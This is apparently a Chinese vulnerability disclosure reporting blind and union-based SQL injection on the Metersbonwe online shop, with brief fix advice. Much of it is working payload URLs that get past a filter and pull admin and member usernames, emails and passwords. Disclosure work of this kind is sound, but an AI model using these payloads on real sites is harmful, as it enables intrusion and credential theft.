美特斯邦威官方商城某盲注，赞一下厂商，漏洞响应很快，修复得很快，也加了防注。。找了很久才发现这小问题。。再修一下吧。。。

http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23
 
http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23
 
order 弄盲注 在when 1=1 1=2那里返回条件看出评论的排序。
 
 
 
http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175
 
这里应该也存在注入，不过好像利用不了，测试在后面加上各种SQL语句。注意，空格用%0a代替。。。（估计是加了防火墙）




http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23
 
http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23
 
order 弄盲注 在when 1=1 1=2那里返回条件看出评论的排序。www.2cto.com
 
 
 
http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175
 
这里应该也存在注入，不过好像利用不了，测试在后面加上各种SQL语句。注意，空格用%0a代替。。。（估计是加了防火墙）
修复方案：

再改进一下就完美了。。


第二个：美特斯邦威官方商城某union注入
详细说明：注入点：
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175
 
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,user%28%29%23
 
"open_user@10.80.30.240"
 
查管理员：
 
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,user_name,0x7c,%20email,0x7c,password%29%20from%20system_admin_user%23
 
查会员（只查了自己乱注册的号，确认与会员同库）：
http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,email,0x7c,%20user_name,0x7c,password%29%20from%20user_users%20where%20user_name%20like%200x616161616161616263%20limit%201%23
 
 
觉得商城应该会员数据与网站的分离，这样才能保证会员数据的安全性。
 


 
修复方案：

应该懂！数字型注入，注意了。。。



作者 kobin97